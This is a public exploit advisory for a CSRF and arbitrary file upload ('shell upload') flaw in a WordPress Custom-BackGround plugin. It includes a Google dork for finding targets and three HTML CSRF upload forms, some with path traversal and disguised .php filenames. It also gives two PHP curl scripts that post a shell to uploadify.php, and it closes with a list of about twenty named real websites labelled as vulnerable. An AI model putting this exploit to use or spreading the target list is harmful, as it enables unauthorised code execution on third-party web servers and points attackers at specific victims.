####################################################################
# Exploit Title : WordPress Custom-BackGround Plugins 3.0 CSRF Shell Upload Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 19/03/2020
# Vendor Homepage :
# Sofware Link : plugins.righthere.com/custom-backgrounds/
# Software Affected Version :
Requires at least: 3.0
Tested up to: 3.3.1
Stable tag: 3.1.5 rev22255
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dork : inurl:/wp-content/plugins/custom-background/
# Vulnerability Type :
CWE-352 [ Cross-Site Request Forgery (CSRF) ]
CWE-264 [ Permissions, Privileges, and Access Controls ]
CWE-434 [ Unrestricted Upload of File with Dangerous Type ]
# PacketStormSecurity : packetstormsecurity.com/files/authors/13968
# CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
# Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
####################################################################
# Impact :
***********
WordPress Custom-BackGround Plugins 3.0 is prone to a vulnerability that lets attackers
upload arbitrary files because it fails to adequately sanitize user-supplied input.
An attacker can exploit this vulnerability to upload arbitrary code and execute
it in the context of the webserver process. This may facilitate unauthorized access
or privilege escalation; other attacks are also possible.
CWE-352: Cross-Site Request Forgery (CSRF)
******************************************
The web application does not, or can not, sufficiently verify whether a well-formed,
valid, consistent request was intentionally provided by the user who submitted the request.
When a web server is designed to receive a request from a client without any mechanism
for verifying that it was intentionally sent, then it might be possible for an attacker to trick a
client into making an unintentional request to the web server which will be treated as an
authentic request. This can be done via a URL, image load, XMLHttpRequest, etc. and
can result in exposure of data or unintended code execution.
CWE-264: Permissions, Privileges, and Access Controls
**************************************************
Weaknesses in this category are related to the management of permissions, privileges, and
other security features that are used to perform access control.
CWE-434: Unrestricted Upload of File with Dangerous Type
****************************************************
The software allows the attacker to upload or transfer files of dangerous types that can
be automatically processed within the product's environment.
####################################################################
# Arbitrary File Upload / Unauthorized File Insert / Shell Upload Exploit :
***************************************************************
CSRF Cross Site Request Forgery Exploiter 1 =>
******************************************
<form method="POST" action="VULNERABLEWEBSITEHERE/wp-content/plugins/custom-background/uploadify/uploadify.php"
enctype="multipart/form-data">
<input type="file" name="files[]" /><button>Upload</button>
</form>
# CSRF Cross Site Request Forgery Exploit 2 =>
****************************************
<title>WordPress Custom-BackGround Plugins Exploiter</title>
<form action="http://[VULNERABLEWEBSITE]/wp-content/plugins/custom-background/uploadify/uploadify.php" method="post" enctype="multipart/form-data">
<body background=" ">
<input type="file" name="file" id="file"><br>
<input name="form_id" value="../../../" type=hidden">
<input name="name" value="kingskrupellos.php.pjpg" type=''hidden">
<input name="gform_unique_id" value="../../" type="hidden">
<input name="field_id" value="" type="hidden">
<input type="submit" name="gform_submit" value="submit">
# CSRF Cross Site Request Forgery Exploit 3=>
****************************************
<html>
<body>
<form action="http://www.[VULNERABLESITE].gov/wp-content/plugins/custom-background/uploadify/uploadify.php" method="POST" enctype="multipart/form-data">
<input type="hidden" name="task" value="drm_add_new_album" />
<input type="hidden" name="album_name" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" />
<input type="hidden" name="album_desc" value="WordPress Custom-BackGround Plugins Exploiter Cyberizm" />
<input type="file" name="album_img" value="" />
<input type="submit" value="Submit" />
</form>
</body>
</html>
</form>
PHP Exploiter Code 1 :
*********************
<?php
$uploadfile="kingskrupellos.php.pjpg"; /// KingSkrupellos ! Cyberizm Digital Security Army ^_^
$ch = curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('file'=>"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
PHP Exploiter Code 2 :
*********************
<?php
$uploadfile="kingskrupellos.php.jpg";
$ch =
curl_init("http://127.0.0.1/wp-content/plugins/custom-background/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",
'folder'=>'/wp-content/plugins/custom-background/uploadify/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
# Vulnerability Error :
********************
{"R":"ERR","MSG":"No access"}
/wp-content/plugins/custom-background/uploadify/uploadAttachment.php
/wp-content/plugins/custom-background/uploadify/uploadify.php
####################################################################
# Example Vulnerable Sites :
************************
[+] btee.org/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] pureflixstudio.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] piersfaccini.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] greentouch.tn/shop/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] chalet-des-sens.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] conamiescie.info/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] normandiecontacts.fr/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] capsostv.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] whiteandbluereview.com/dev/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] visitequebec.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] insidefitnessmag.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] espressomelbourne.com/2014/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] zozijncoaching.nl/site/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] africanamericangolfersdigest.com/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] waterwellsforafrica.org/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] radio104.fm.br/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] karikatur-graz.at/wp-content/plugins/custom-background/uploadify/uploadAttachment.php
[+] purplepictures.net/wp-content/plugins/custom-background/uploadify/uploadify.php
[+] osiguranje.me/wp-content/plugins/custom-background/uploadify/uploadAttachment.php
####################################################################
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
####################################################################